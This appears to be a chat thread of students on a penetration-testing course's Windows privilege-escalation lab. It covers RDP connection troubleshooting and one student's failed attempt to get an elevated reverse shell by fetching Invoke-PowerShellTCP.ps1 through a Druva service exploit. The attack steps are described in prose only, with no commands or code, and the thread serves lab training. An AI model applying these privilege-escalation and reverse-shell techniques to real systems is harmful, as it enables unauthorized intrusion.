This specific IP has been up for 10 minutes now
I've reset the attack host 5 times, each time giving it 5-10 minutes and it keeps throwing the same error
Maybe need domain name if has domain
Works fine
Hmm, if it's working for you it must be an issue on my end. Let me try resetting my VPN and see if that helps any
There is also a certificate validation/verification fail
Try setting /cert-ignore
Resetting VPN didn't work, but /cert-ignore did. Thank you!
interesting, i was able to connect without it 😆
Same.... But probably must have imputed not to trust the self signed cert
You have to set a variable by winrm first
It is explained in the section, let me search the command
I need help with a section on the privesc with windows module, on the vulnerable services section, I can't seem to get the Invoke-PowerShellTCP.ps1 script to give me an elevated reverse shell. When I run the Druva exploit using any other command it runs fine, for instance I put htb-student into the administrators group. What happens when I try to download the shell.ps1 script off my attack machine is that it doesn't download the shell.ps1 script.
So I used an smb server to transfer it instead and still the script wouldn't give me an elevated shell
Didn't see you already solved it, my bad
I am stuck on the same part, were you able to find out how to solve the error?
